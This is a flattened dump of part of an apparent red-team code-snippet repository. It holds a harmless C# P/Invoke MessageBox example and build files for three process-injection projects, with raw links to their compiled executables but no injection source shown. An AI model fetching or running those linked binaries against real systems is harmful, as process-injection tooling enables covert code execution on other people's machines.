5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\message_box_ordinal\\message_box_ordinal\\message_box_ordinal.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/PInvoke.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
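namespace PInvoke
{
    // Minimal P/Invoke example: declares one user32.dll function and calls it
    // from Main.
    internal class Program
    {
        // Managed declaration of MessageBoxW from user32.dll. CharSet.Unicode
        // marshals the two string parameters as UTF-16, matching the wide ("W")
        // variant of the API.
        //
        // DefaultDllImportSearchPaths restricts the library load to the System32
        // directory, so the load location is explicit instead of depending on
        // the default probing order (which can include the application's own
        // directory).
        [DllImport("user32.dll", CharSet = CharSet.Unicode)]
        [DefaultDllImportSearchPaths(DllImportSearchPath.System32)]
        static extern int MessageBoxW(IntPtr hWnd, string lpText, string lpCaption, uint uType);

        // Entry point: shows one message box, passing IntPtr.Zero as hWnd (no
        // owner window) and 0 as uType (MB_OK). The returned int is ignored and
        // args is unused.
        static void Main(string[] args)
        {
            MessageBoxW(IntPtr.Zero, "My first P/Invoke", "Hello World!", 0);
        }
    }
}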
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "PInvoke/1.0.0": {
10 | "runtime": {
11 | "PInvoke.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "PInvoke/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.dll
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.exe
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.pdb
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/bin/Debug/netcoreapp3.1/PInvoke.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 9e757931411dfb9bdddde4d3b5e0787e30c22b30
2 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = PInvoke
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\PInvoke\PInvoke\
4 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.assets.cache
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | fc9c814ed963a5f84495ebe65f08a3299e1d96f2
2 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.dll
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 9ef52f5bd7f4cff3d652c0e7935269a83934d959
2 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.pdb
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/PInvoke.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/PInvoke/PInvoke/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "yDtPFkmmK0x6Bj1ejJZrdurmesNI0rv96zUDh+/MJumZu2Dpwe/87a+H9GWhqp47DKyxck1DYE+fN/Hh/cSLjg==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\PInvoke\\PInvoke\\PInvoke.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/PInvoke/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "runtime": {
11 | "ConsoleApp1.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "ConsoleApp1/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_CreateRemoteThread\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 3914a16dc66868dc2364d6ffe4a1fc74b6920dcb
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "69n3ZJsUquHc4sOxi/CNchuohQhlJ+YJdDUezVnncW81sNReBiw65j6wg0uOTtyKpJLp0yACMx37kyAUhkLhiw==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_CreateRemoteThread\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "runtime": {
11 | "ConsoleApp1.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "ConsoleApp1/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_CreateThread\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | e744f908d881bf42cab133eb47ad3549e1832016
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "T5DCfvOqD/FmHEOz/I1KvKlgHbnKKs7Ont7s1fKDrylAu8i7pL5K61si8oGNungJMlNsJZEq9ejv5J+oBIPQDA==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_CreateThread\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "runtime": {
11 | "ConsoleApp1.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "ConsoleApp1/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_NtMapViewOfSection\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | dbc5f2d2dde9ded4efa7a46af73bce5b7462ad86
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
